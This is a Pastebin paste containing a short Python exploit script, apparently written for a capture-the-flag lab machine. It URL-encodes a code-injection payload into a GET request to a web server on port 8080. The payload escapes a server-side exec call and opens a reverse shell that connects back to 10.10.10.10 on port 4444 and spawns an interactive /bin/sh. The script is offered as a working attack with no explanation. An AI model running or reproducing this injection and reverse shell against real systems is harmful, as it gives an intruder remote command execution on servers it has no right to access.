Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python3
- import requests
- import subprocess
- import urllib
- url = "http://10.10.10.168:8080/"
- # {ESCAPE} needs to break out of the scripts exec function and back in
- command = "{ESCAPE}import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.10\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);{ESCAPE}"
- injection = urllib.parse.quote(command)
- payload = url+injection
- print(payload)
- r = requests.get(payload)
- print(r.text)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement